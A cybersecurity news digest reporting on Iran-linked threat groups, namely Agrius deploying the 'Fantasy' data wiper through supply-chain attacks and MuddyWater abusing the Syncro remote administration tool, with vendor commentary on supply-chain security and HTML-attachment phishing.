Recent Iranian cyber operations.

Researchers are discussing recent activity of Iran-linked threat actors, some of which are using a new data wiper, while others are updating a remote administration tool.

The Fantasy data wiper is all too real.

Bleeping Computer reports that a new data wiper, coined "Fantasy," has been seen in use by the Agrius APT group in supply-chain attacks against targets in Israel, Hong Kong, and South Africa. The campaign reportedly began in February of this year and took hold in March, victimizing an IT support services firm, a diamond wholesaler, a jeweler, and an HR consulting company. This new wiper is an evolution of the “Apostle” wiper, seen previously in use by the hacking group, according to analysts from ESET. Anand Revashetti, CTO and Co-Founder of Lineaje, says that the use of this data wiper emphasizes the importance of software supply chain security, saying, “The ‘Fantasy’ data wiper that was deployed by an Israeli software developer is just the latest example of why CISO’s need to make software supply chain security a top priority in the upcoming year. Gartner has already predicted that by 2025, 45% of organizations worldwide will experience attacks on their software supply chains, which is a three-fold increase from 2021. To combat it, organizations need to know what’s in their software to not only discover risks, but to be more proactive in mediating the threats they impose. That is why it’s critical to have solutions that help consumers analyze software supply chain and avoid deployment of unknown and malicious components hidden in legitimate software.”

MuddyWater and Syncro.

Iran-affiliated threat group MuddyWater has been observed by Dark Instinct researchers abusing a new remote administration tool, known as Syncro, against target devices, Dark Reading reports. Syncro is a managed service provider (MSP) platform that replaced the group’s other remote administration tool "RemoteUtilities," which was seen in use in September. The Hacker News says that the software allows for complete control of machines remotely, which allows for reconnaissance, backdoors, and the sale of access to outside actors.

We heard from Cofense on the campaign. “Spear-phishing continues to be the intrusion vector of choice for many advanced threat groups, and although users may often not see themselves as important targets, they can easily become a stepping stone toward the real target. Advanced persistent threat actors are definitely persistent in more ways than one, and will often expend significant effort in open-source research to identify an important target's social and professional network. If they can compromise just one email account belonging to someone in that network, they are able to abuse established trust by sending phishing emails from that account to the final target or to other "stepping stones," as reportedly done in the MuddyWater campaign against Egyptian hosting companies,” said Joe Gallop, Cyber Threat Intelligence Manager at Cofense. “The use of HTML attachments (as seen in this campaign) is not new, but Cofense Intelligence has observed some notable spikes in HTML attachment phishing recently. The use of HTML smuggling legitimate HTML5 and JavaScript capabilities in an HTML attachment to deliver embedded malicious content is done after the file has been opened on the target computer, rather than beforehand, by operators of Qakbot malware, which is our "phishing malware family to watch" for this quarter. HTML attachments are used to harvest credentials without ever sending the victim to a website, by abusing legitimate form-submission services. It is important for security teams to train all users to recognize these and other ways in which threat actors make use of HTML attachments in phishing, or risk missing an evasive and successful form of phishing."